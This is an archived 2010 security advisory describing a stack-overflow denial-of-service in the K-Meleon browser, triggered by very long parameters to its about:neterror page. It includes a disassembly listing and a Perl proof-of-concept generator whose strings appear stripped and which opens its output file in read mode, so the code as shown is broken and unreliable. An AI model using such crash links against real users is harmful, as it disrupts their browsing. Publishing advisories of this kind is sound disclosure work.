AOH :: HP Unsorted K :: B1A-1648.HTM

K-Meleon for windows Stack Overflow DoS



=?ISO-8859-1?Q?Fwd=3A_=7BLostmon=B4s_Group=7D_K=2DMeleon_for_windows_about=3An?= =?ISO-8859-1?Q?eterror_Stack_Overflow_DoS?=
=?ISO-8859-1?Q?Fwd=3A_=7BLostmon=B4s_Group=7D_K=2DMeleon_for_windows_about=3An?= =?ISO-8859-1?Q?eterror_Stack_Overflow_DoS?=



############################################
K-Meleon for windows about:neterror Stack Overflow DoS
Vendor URL:http://kmeleon.sourceforge.net/ 
Advisore:http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html 
Vendor notified:Yes exploit available: YES
############################################

K-Meleon is an extremely fast, customizable, lightweight web browser
based on the Gecko layout engine developed by Mozilla which is also
used by Firefox. K-Meleon is free, open source software released under
the GNU General Public License and is designed specifically for
Microsoft Windows (Win32) operating systems.

K-Meleon is prone vulnerable to crashing with a very long URL...
Internal web pages like about:neterror does not limit the amount of
chars that a user put in 'c' 'd' params and them if we compose a
malformed url the browser can be chash easy.This issue is exploitable
via web links like click here or via
window.location.replace('very long url') or similar vectors.

#################
Versions Tested
#################

I have tested this issue in win xp sp3 and a windows 7 fully pached.

Win XP sp3:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes )
K-Meleon 1.6.0a4 Vulnerables.(crashes)

windows 7 Ultimate:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes)
K-Meleon 1.6.0a4 Vulnerables.(crashes)

############
References
############

Discovered: 29-07-2010
vendor notify:31-07-2010
Vendor Response:
Vendor patch:

########################
ASM code stack overflow
########################

ScreenShot => http://2.bp.blogspot.com/_oOk20qcOiUk/TFmDVYmRvHI/AAAAAAAAADM/GMymL2zrnRc/s1600/k-meleon.png 

CPU Disasm
Address =A0 Hex dump =A0 =A0 =A0 =A0 =A0Command
0043CB3F =A0 =A0 =A0CC =A0 =A0 =A0 =A0 =A0 =A0INT3
0043CB40 =A0/$ =A03D 00100000 =A0 CMP EAX,1000
0043CB45 =A0|. =A073 0E =A0 =A0 =A0 =A0 JNB SHORT 0043CB55
0043CB47 =A0|. =A0F7D8 =A0 =A0 =A0 =A0 =A0NEG EAX
0043CB49 =A0|. =A003C4 =A0 =A0 =A0 =A0 =A0ADD EAX,ESP
0043CB4B =A0|. =A083C0 04 =A0 =A0 =A0 ADD EAX,4
0043CB4E =A0|. =A08500 =A0 =A0 =A0 =A0 =A0TEST DWORD PTR DS:[EAX],EAX
0043CB50 =A0|. =A094 =A0 =A0 =A0 =A0 =A0 =A0XCHG EAX,ESP
0043CB51 =A0|. =A08B00 =A0 =A0 =A0 =A0 =A0MOV EAX,DWORD PTR DS:[EAX]
0043CB53 =A0|. =A050 =A0 =A0 =A0 =A0 =A0 =A0PUSH EAX
0043CB54 =A0|. =A0C3 =A0 =A0 =A0 =A0 =A0 =A0RETN
0043CB55 =A0|> =A051 =A0 =A0 =A0 =A0 =A0 =A0PUSH ECX
0043CB56 =A0|. =A08D4C24 08 =A0 =A0 LEA ECX,[ARG.1]
0043CB5A =A0|> =A081E9 00100000 /SUB ECX,1000
0043CB60 =A0|. =A02D 00100000 =A0 |SUB EAX,1000
0043CB65 =A0|. =A08501 =A0 =A0 =A0 =A0 =A0|TEST DWORD PTR DS:[ECX],EAX <== Stack overflow
0043CB67 =A0|. =A03D 00100000 =A0 |CMP EAX,1000
0043CB6C =A0|.^ 73 EC =A0 =A0 =A0 =A0 \JNB SHORT 0043CB5A
0043CB6E =A0|. =A02BC8 =A0 =A0 =A0 =A0 =A0SUB ECX,EAX
0043CB70 =A0|. =A08BC4 =A0 =A0 =A0 =A0 =A0MOV EAX,ESP
0043CB72 =A0|. =A08501 =A0 =A0 =A0 =A0 =A0TEST DWORD PTR DS:[ECX],EAX
0043CB74 =A0|. =A08BE1 =A0 =A0 =A0 =A0 =A0MOV ESP,ECX
0043CB76 =A0|. =A08B08 =A0 =A0 =A0 =A0 =A0MOV ECX,DWORD PTR DS:[EAX]
0043CB78 =A0|. =A08B40 04 =A0 =A0 =A0 MOV EAX,DWORD PTR DS:[EAX+4]
0043CB7B =A0|. =A050 =A0 =A0 =A0 =A0 =A0 =A0PUSH EAX
0043CB7C =A0\. =A0C3 =A0 =A0 =A0 =A0 =A0 =A0RETN
0043CB7D =A0 =A0 =A0CC =A0 =A0 =A0 =A0 =A0 =A0INT3
0043CB7E =A0 =A0 =A0CC =A0 =A0 =A0 =A0 =A0 =A0INT3




################
#Proof Of Concept
################

#######################################################################
#!/usr/bin/perl
# k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com 
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# generate the file open it with k-keleon click in the link and wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print "Usage: $0 \n";

}

$cabecera = "" . "\n";
$payload = "click here if you can :)" . "\n";
$fin = "";

$datos = $cabecera . $payload . $fin;

open(FILE, '<' . $archivo);
print FILE $datos;
close(FILE);

exit;

################## EOF ######################

##############
Related Links
##############

vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251 
Posible related Vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### =80nd #############################

Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.

atentamente:
Lostmon (lostmon@gmail.com) 
Web-Blog: http://lostmon.blogspot.com/ 
Google group: http://groups.google.com/group/lostmon (new) 
--
La curiosidad es lo que hace mover la mente...

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.